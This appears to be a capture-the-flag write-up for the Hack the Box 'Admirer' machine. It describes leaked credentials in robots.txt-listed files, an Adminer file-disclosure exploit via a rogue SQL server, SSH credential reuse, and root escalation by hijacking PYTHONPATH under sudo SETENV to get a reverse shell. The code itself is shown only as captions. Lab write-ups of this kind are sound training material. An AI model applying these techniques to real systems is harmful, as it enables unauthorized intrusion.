Admirer was an easy difficulty machine on Hack the Box. Here’s my take on solving the challenge.

Admirer

User

Nmap reveals three running services:

Nmap scan

FTP doesn’t allow anonymous connections. On the other hand robots.txt on webserver reveals an interesting directory:

User-agent: *

# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir

It also gives an idea what kind of files to look for in the dir. Indeed, admin-dir/credentials.txt yields a couple o logins with passwords:

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

FTP account are working and give access to two files:

FTP access

After unpacking the html.tar.gz it reveals folder structure of a webapp. Unfortunately it seems to be a an outdated version. For example w4ld0s_s3cr3t_d1r was renamed to admin-dir. Also database credentials in index.php are wrong and with a syntax error:

Broken credentials

Nevertheless, the archive reveals another important directory: utility-scripts. The scripts in the dir are not very useful for attacker. But enumeration reveals one more script:

Dirb scan of utility-scripts

The adminer app has a known file disclosure vulnerability. It can be exploited using a Rougue-Sql-Server. Attacker needs to modify the script and add a local file path to files they want to read:

Example file list

After running the rougue-sql script the adminer.php can be used to connect back to the attacker’s machine:

Adminer

After that, the mysql.log will contain index.php content, this time with working credentials:

$username = “waldo”;
$password = “&<h5b~yK3F#{PaPB&dA}{H>”

As it turns out these credentials are reused in SSH, giving user access and flag:

User access

Privlege escalation

Sudo allows waldo user to run admin_tasks.sh script with SETENV flag:

Sudo settings

The script runs various administrative tasks depending on the option number given in argument:

admin_tasks

Option number 6, backup_web runs a Python script:

This script loads and runs make_archive function from shutil library:

Backup.py script

Because attacker has control over the enviromental variables (because of sentenv flag), they can overwrite the shutil library with their own code, for example with a reverse shell:

Overwriting the make_archive function

Now sudo running the script with overwritten PYTHONPATH variable should run the revshell with root privleges:

Running privesc script
Root reverse shell